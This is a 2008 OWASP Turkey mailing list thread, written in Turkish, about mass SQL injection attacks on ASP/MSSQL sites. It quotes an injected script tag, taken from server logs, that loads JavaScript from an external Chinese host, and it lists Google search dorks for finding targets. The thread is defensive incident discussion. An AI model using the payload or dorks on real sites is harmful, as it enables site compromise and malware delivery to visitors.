[Owasp-turkey] SQL Injection kullanan WORM'lar

Bedirhan Urgun urgunb at hotmail.com
Thu May 15 03:19:23 EDT 2008


 
Merhaba,
Bu saldirilar bir worm seklinde midir bilmiyorum ama kesin bisey soylemek guc tabi. Gecen ay ve bu ay "massive sql injection" basligi altinda raporlar, haberler cikmisti. Ilgili saldirilarin (hatta saldiriyi yapmak icin kullanilan Cin kaynakli uygulamanin) analizini asagidaki linkten okumustum.
 
http://isc.sans.org/diary.html?n&storyid=4294
 
Kisaca uygulama, kurbanlarini google kullanarak asp sayfalarindan ve bu sayfalarda a parametresi (URL'de olunca tabi insanin aklina GET yerine POST kullanmanin hic de o kadar hafife alinmamasi gereken bi teknik/oneri oldugu geliyor) kullananlardan seciyormus. Google'dan arattim;
 
inurl:.asp inurl:a=
 
ve 3,220,000 sonuc cikti. Bunlardan 10,000'i 20,000'i hacklenmis cok mu? :P (Bu a isminin bi sihri var herhaldeki bu kadar gelistirici kullanmis) Yanliz
 
inurl:.asp inurl:b=
 
sorgusu 5,560,000 sonuc veriyor. Yani daha iyi (saldirgan acisindan). Hatta
 
inurl:.asp inurl:c=
 
sorgusu 14,100,000 sonuc veriyor. Yani belki de uygulamanin saldiramayacagi kadar fazla... 
 
bedirhan



> Date: Mon, 12 May 2008 13:18:53 +0300> From: huzeyfe at lifeoverip.net> To: owasp-turkey at lists.owasp.org> Subject: Re: [Owasp-turkey] SQL Injection kullanan WORM'lar> > Selamlar,> > benzer turde wormu -yontemi ayni, arac ve amaclar degisik- bir aydir > farkli sekilde ben ilgiyle izliyorum*. Sadece MSSQL'i i ilgilendirse de > Mysql kullanan sistemlerin loglarinda da denemeleri goruyoruz.> > > Aslinda bu son worm hadisesi web tarafinin guvenligini -sayfa icerigi > degistirilmedikce(deface)- cok dikkate almayan sirket yoneticilerini > biraz daha ikna etmis oldu.> > *http://blog.lifeoverip.net/index.php/2008/04/30/son-gunlerin-seri-sql-injection-saldirilarina-dair/> > Deniz CEVIK wrote:> > Selamalar,> > > > Son iki haftadır 4-5 yerden siteleri değiştirildiğine dair şikayetler> > geldi. Sunucu loglarını detaylı incelediğimde aynı SQL injection> > pattern'i ile karşılaştık. SQL injectioni inceleyince tüm sistem> > tablolarına aşağıdaki gibi bir kayıtlar eklediği anlaşılıyor. Oldukça> > zararlı bir kod. Sql injection açığı bulunan sitelere banner ekleyerek> > para kazanmayı amaçlayan saldırılar ve çoğu çin kökenli.> > > > </title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--> > > > http://isc.incidents.org/diary.html?storyid=4393> > _______________________________________________> > Owasp-turkey mailing list> > Owasp-turkey at lists.owasp.org> > https://lists.owasp.org/mailman/listinfo/owasp-turkey> _______________________________________________> Owasp-turkey mailing list> Owasp-turkey at lists.owasp.org> https://lists.owasp.org/mailman/listinfo/owasp-turkey
_________________________________________________________________
Windows Live SkyDrive lets you share files with faraway friends.
http://www.windowslive.com/skydrive/overview.html?ocid=TXT_TAGLM_WL_Refresh_skydrive_052008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20080515/d2d795d8/attachment.html 


More information about the Owasp-turkey mailing list